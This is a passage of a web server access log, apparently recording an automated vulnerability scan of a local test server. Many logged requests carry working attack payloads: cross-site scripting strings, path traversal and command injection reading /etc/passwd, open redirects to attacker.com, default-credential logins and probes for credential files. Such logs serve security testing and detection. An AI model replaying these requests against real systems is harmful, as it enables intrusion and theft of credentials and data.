"http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"SAMLResponse=%22%3E%3Csvg/onload=alert(/297MFhANqdpW90G2y8keYUXcDIM/)%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /home.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tests/generate.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/systemcall.php?command=cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/user.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/test.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.settings/rules.json?auth=FIREBASE_SECRET HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:10 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow>\x0D\x0A ]>\x0D\x0A\x0D\x0AJohn\x0D\x0A&ent;\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/api/product/manger/getInfo HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apache-default/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gtranslate/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET ///////../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /inizio.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MPOOrTBr0kKBPWMNzf8FYuwo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account/register HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Default.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /static///////../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ampps-admin/index.php?act=login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug.seam HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/downloads?fileName=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET ///../app.js HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.007","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"Password=297MPMyguYO6mThF5YsaMGXWLIy&ConfirmPassword=297MPMyguYO6mThF5YsaMGXWLIy&RememberMe=true&__RequestVerificationToken={{csrf}}&RememberMe=false","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /account/register HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1/account/register", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/bin/sqlnet.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /echo-server.html?code=test&state=http://www.attacker.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /forum/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /awstats.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/data?chart=system.cpu&format=json&points=125&group=average>ime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&after=-120&dimensions=iowait HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graphql?query=+{customerDownloadableProducts+{+items+{+date+download_url}}+} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /script/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/system/deviceinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ibmmq/console/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/awstats.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /deltaweb/hmi_login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /names.nsf/People?OpenView HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.dbeaver/credentials-config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v3/users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crossdomain.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=dff1db99c9ecc3c645a4239e20e8ba32 HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.001","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"username=admin&password=admin&_submit_check=1&jlbqgb7g0x=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:33 +0000","request_body":"UPusername=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E&UPpassword=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /MUP/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"127.0.0.1/MUP", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": 